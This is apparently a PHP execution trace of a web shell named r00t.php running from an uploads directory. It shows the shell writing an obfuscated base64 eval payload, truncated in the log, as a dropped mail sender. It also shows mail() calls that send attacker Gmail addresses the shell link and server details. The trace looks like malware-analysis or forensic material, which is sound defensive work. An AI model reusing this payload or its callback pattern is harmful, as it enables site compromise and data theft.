3	40	0	2.087260	534816	fwrite	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	2	resource(7) of type (stream)	'<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
3	40	1	2.087353	534880
3	40	R			47513
3	41	0	2.087367	534816	fclose	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	resource(7) of type (stream)
3	41	1	2.087431	534416
3	41	R			TRUE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$yol = 'http://localhost/uploads/r00t.php'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$header .= 'From: SheLL Boot <suppor@nic.org>\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$header .= 'Content-Type: text/html;\n charset=utf-8\n'
3	42	0	2.087541	534688	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	4	'byhero44@gmail.com'	'Hacklink Bildiri'	'<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>'	'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\n charset=utf-8\n'
3	42	1	2.088632	534832
3	42	R			FALSE
3	43	0	2.088668	534688	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	4	'loginoldum@gmail.com'	'Hacklink Bildiri'	'<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>'	'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\n charset=utf-8\n'
3	43	1	2.089821	534832
3	43	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$kime = 'loginoldum@gmail.com'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$baslik = 'sym404 shell 20203'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$EL_MuHaMMeD = 'Dosya Yolu : /var/www/html\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$EL_MuHaMMeD .= 'Server Admin : webmaster@localhost\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$EL_MuHaMMeD .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	39	$EL_MuHaMMeD .= 'Shell Link : http://localhost/uploads/r00t.php\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$EL_MuHaMMeD .= 'Avlanan Site : localhost\r\n'
3	44	0	2.089948	534912	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	3	'loginoldum@gmail.com'	'sym404 shell 20203'	'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/r00t.php\r\nAvlanan Site : localhost\r\n'
3	44	1	2.091034	535008
3	44	R			FALSE
2	5	1	2.091071	534912
1	3	1	2.091084	482928
			2.091127	384288
TRACE END   [2023-02-12 19:54:25.278771]